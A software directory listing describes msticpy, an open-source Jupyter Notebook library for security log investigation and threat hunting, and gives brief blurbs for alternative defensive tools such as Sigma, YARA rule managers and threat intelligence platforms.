msticpy Logo

msticpy

0
Free
Visit Website

msticpy is a library for InfoSec investigation and hunting in Jupyter Notebooks. It includes functionality to: - Query log data from multiple sources - Enrich the data with Threat Intelligence, geolocations and Azure resource data - Extract Indicators of Activity (IoA) from logs and unpack encoded data - Perform sophisticated analysis such as anomalous session detection and time series decomposition - Visualize data using interactive timelines, process trees and multi-dimensional Morph Charts - Includes time-saving notebook tools such as widgets to set query time boundaries, select and display items from lists, and configure the notebook environment. - Initially developed to support Jupyter Notebooks authoring for Azure Sentinel, now extended to pull log data from other sources.

FEATURES

ALTERNATIVES

An open source threat intelligence platform for storing and managing cyber threat intelligence knowledge.

Cyber Intelligence Management Platform with threat tracking, forensic artifacts, and YARA rule storage.

Container of 200 Windows EVTX samples for testing detection scripts and training on DFIR.

eCrimeLabs provides a SOAR platform for threat detection and response, integrated with MISP.

Sigma is a generic and open signature format for SIEM systems and other security tools to detect and respond to threats.

A free and open-source OSINT framework for gathering and analyzing data from various sources

Open source web app for storing and searching Actor related data from users and public repositories.

Tool for managing Yara rules on VirusTotal